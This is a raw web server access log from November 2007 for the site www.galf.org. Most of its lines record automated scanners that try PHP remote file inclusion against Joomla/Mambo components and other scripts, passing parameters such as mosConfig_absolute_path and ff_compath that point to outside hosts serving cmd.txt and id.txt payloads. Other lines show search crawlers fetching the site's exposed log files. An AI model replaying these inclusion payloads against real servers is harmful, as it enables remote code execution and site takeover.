166.70.169.66 - - [18/Nov/2007:17:04:27 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:17:05:03 -0800] "GET /logs/index.php?go=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
74.208.16.34 - - [18/Nov/2007:17:05:03 -0800] "GET /index.php?go=http://permaya.org/b?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.galf.org"
166.70.169.66 - - [18/Nov/2007:17:05:45 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
166.70.169.66 - - [18/Nov/2007:17:05:46 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.105.69.61 - - [18/Nov/2007:17:06:29 -0800] "GET /logs//admin/includes/admin_header.php?level=http://www.surftips.com//dotproject/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.105.69.61 - - [18/Nov/2007:17:06:29 -0800] "GET //admin/includes/admin_header.php?level=http://www.surftips.com//dotproject/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:17:06:30 -0800] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.38.129.76 - - [18/Nov/2007:17:07:30 -0800] "GET //template.php?pagina=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.180.250.118 - - [18/Nov/2007:17:08:21 -0800] "GET /logs/access_070813.log HTTP/1.0" 200 524288 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
82.194.71.79 - - [18/Nov/2007:17:08:22 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.194.71.79 - - [18/Nov/2007:17:08:22 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.194.71.79 - - [18/Nov/2007:17:08:36 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
82.194.71.79 - - [18/Nov/2007:17:08:37 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://bondick.net/flashchat/nick_image/htaccess? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:17:10:03 -0800] "GET /logs/access_071029.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:17:12:13 -0800] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.249.45.6 - - [18/Nov/2007:17:13:32 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.45.6 - - [18/Nov/2007:17:13:32 -0800] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://bocairent.net/phpmyadmin/README.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
74.6.26.117 - - [18/Nov/2007:17:13:34 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.30.216.8 - - [18/Nov/2007:17:13:34 -0800] "GET /logs/access.log HTTP/1.0" 200 29099 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
68.180.250.72 - - [18/Nov/2007:17:13:54 -0800] "GET /logs/access_070820.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:17:13:59 -0800] "GET /logs/test.php?page=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
80.168.55.27 - - [18/Nov/2007:17:13:59 -0800] "GET /test.php?page=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.13.63.190 - - [18/Nov/2007:17:15:44 -0800] "GET //skin/zero_vote/error.php?dir=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.30.214.230 - - [18/Nov/2007:17:16:32 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.13.63.190 - - [18/Nov/2007:17:19:16 -0800] "GET //login.php?dir=http://www.cantorque.ca/themes/cantorque/list.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:17:20:28 -0800] "GET /logs/access_070827.log HTTP/1.0" 200 549059 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.70.0.203 - - [18/Nov/2007:17:25:18 -0800] "GET /logs/access_070903.log HTTP/1.1" 200 655360 "http://www.google.com/search?hl=en&q=c99.txt+ayastar&btnG=Search&lr=lang_en" "Opera/9.24 (Windows NT 5.1; U; en)" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:17:25:59 -0800] "GET /logs/access_070917.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
202.171.48.89 - - [18/Nov/2007:17:27:26 -0800] "GET /main.php?pagina=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
68.180.250.107 - - [18/Nov/2007:17:27:28 -0800] "GET /logs/access_070924.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
80.237.228.242 - - [18/Nov/2007:17:27:36 -0800] "GET //include.php?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.206.86.56 - - [18/Nov/2007:17:27:53 -0800] "GET /logs//index.php2?=http://geocities.com/abalabalnya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
213.206.86.56 - - [18/Nov/2007:17:27:53 -0800] "GET //index.php2?=http://geocities.com/abalabalnya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.57.146.62 - - [18/Nov/2007:17:28:15 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.57.146.62 - - [18/Nov/2007:17:28:15 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
69.57.146.62 - - [18/Nov/2007:17:28:19 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.57.146.62 - - [18/Nov/2007:17:28:19 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.57.146.62 - - [18/Nov/2007:17:28:19 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
69.57.146.62 - - [18/Nov/2007:17:28:19 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://201.37.71.117:8090/cmdimbox.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:17:30:21 -0800] "GET /logs/access_071029.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
217.149.115.250 - - [18/Nov/2007:17:30:22 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.237.228.242 - - [18/Nov/2007:17:31:13 -0800] "GET /logs/access_071015.log//include.php?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.237.228.242 - - [18/Nov/2007:17:31:14 -0800] "GET //include.php?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.237.228.242 - - [18/Nov/2007:17:31:14 -0800] "GET /logs//include.php?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
89.89.224.76 - - [18/Nov/2007:17:32:27 -0800] "GET /logs/access_071112.log HTTP/1.0" 200 7742298 "-" "Wget/1.10.2" "galf.org"
217.149.115.250 - - [18/Nov/2007:17:32:27 -0800] "GET /logs/access_071008.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
80.237.228.242 - - [18/Nov/2007:17:32:43 -0800] "GET /logs/access_070924.log//include.php?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
193.202.63.86 - - [18/Nov/2007:17:32:48 -0800] "GET //index.php?pagina=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.118.106.153 - - [18/Nov/2007:17:34:07 -0800] "GET //include.php?path[docroot]=http://myhost.helloweb.eu/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
87.118.106.153 - - [18/Nov/2007:17:34:22 -0800] "GET /logs//include.php?path[docroot]=http://myhost.helloweb.eu/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
74.6.22.170 - - [18/Nov/2007:17:34:22 -0800] "GET /logs/access.log HTTP/1.0" 200 35943 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
87.118.106.153 - - [18/Nov/2007:17:34:50 -0800] "GET /logs/access_071015.log//include.php?path[docroot]=http://myhost.helloweb.eu/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.207.157.44 - - [18/Nov/2007:17:36:46 -0800] "GET /logs/access_070723.log/index2.php?page=http://www.ownsyou.kit.net/vvvvv/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.62" "www.galf.org"
87.118.106.153 - - [18/Nov/2007:17:37:50 -0800] "GET /logs/access_070924.log//include.php?path[docroot]=http://myhost.helloweb.eu/test.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
59.148.232.33 - - [18/Nov/2007:17:37:58 -0800] "GET /logs/access_070625.log/claroline/inc/claro_init_header.inc.php?includePath=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.148.232.33 - - [18/Nov/2007:17:37:58 -0800] "GET /claroline/inc/claro_init_header.inc.php?includePath=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
59.148.232.33 - - [18/Nov/2007:17:37:58 -0800] "GET /logs/claroline/inc/claro_init_header.inc.php?includePath=http://216.130.166.139/cgi_bin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
74.6.22.170 - - [18/Nov/2007:17:39:53 -0800] "GET /logs/access_070903.log HTTP/1.0" 200 851968 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.235.132.140 - - [18/Nov/2007:17:39:54 -0800] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
212.175.205.226 - - [18/Nov/2007:17:39:59 -0800] "GET /?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [18/Nov/2007:17:40:32 -0800] "GET /logs/access_071015.log/?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [18/Nov/2007:17:40:32 -0800] "GET /?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 200 1048 "-" "libwww-perl/5.808" "www.galf.org"
212.175.205.226 - - [18/Nov/2007:17:40:33 -0800] "GET /logs/?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 200 5371 "-" "libwww-perl/5.808" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:17:40:39 -0800] "GET /logs/access_070716.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:17:40:40 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
122.153.16.5 - - [18/Nov/2007:17:40:46 -0800] "GET /logs/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.177.26.135 - - [18/Nov/2007:17:41:02 -0800] "GET /logs/access_070917.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.177.26.135 - - [18/Nov/2007:17:41:03 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.177.26.135 - - [18/Nov/2007:17:41:03 -0800] "GET /logs/access_070730.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://telkomsex.com/ec.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.206.86.56 - - [18/Nov/2007:17:42:00 -0800] "GET /logs/access_070827.log//index.php2?=http://geocities.com/abalabalnya/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.119.200.212 - - [18/Nov/2007:17:42:49 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.schmid-telecom.com/ide.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
68.101.242.165 - - [18/Nov/2007:17:43:12 -0800] "GET /logs/access_071029.log HTTP/1.1" 200 393216 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.galf.org"
68.101.242.165 - - [18/Nov/2007:17:43:17 -0800] "GET /logs/access_071029.log HTTP/1.1" 206 1105158 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:17:43:51 -0800] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.202.63.86 - - [18/Nov/2007:17:44:51 -0800] "GET /logs/access_070723.log//index.php?pagina=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
193.202.63.86 - - [18/Nov/2007:17:44:52 -0800] "GET /logs//index.php?pagina=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
122.153.16.5 - - [18/Nov/2007:17:46:24 -0800] "GET /logs/access_070903.log/index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s1ko.jazztel.es/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:31 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:31 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:31 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:31 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
82.165.151.170 - - [18/Nov/2007:17:46:31 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:31 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
80.237.228.242 - - [18/Nov/2007:17:46:34 -0800] "GET /logs//include.php?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.237.228.242 - - [18/Nov/2007:17:46:34 -0800] "GET //include.php?path[docroot]=http://zamkad.ru/pub/buffer_upload/.../cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.76.124 - - [18/Nov/2007:17:46:39 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.76.124 - - [18/Nov/2007:17:46:39 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.76.124 - - [18/Nov/2007:17:46:40 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.214.76.124 - - [18/Nov/2007:17:46:40 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:40 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:40 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.76.124 - - [18/Nov/2007:17:46:40 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.76.124 - - [18/Nov/2007:17:46:40 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:40 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:42 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:42 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:43 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:43 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:44 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.214.76.124 - - [18/Nov/2007:17:46:44 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.214.76.124 - - [18/Nov/2007:17:46:44 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:50 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
82.165.151.170 - - [18/Nov/2007:17:46:54 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
216.75.35.118 - - [18/Nov/2007:17:46:59 -0800] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://gds.hu/voodoo/crotz? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
158.251.4.149 - - [18/Nov/2007:17:47:05 -0800] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
158.251.4.149 - - [18/Nov/2007:17:47:05 -0800] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.inteligentesite.com.br/arquivos/marajoara/borda.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET /logs/access_071014.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
65.23.154.7 - - [18/Nov/2007:17:47:07 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
65.23.154.7 - - [18/Nov/2007:17:47:14 -0800] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://cotine.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
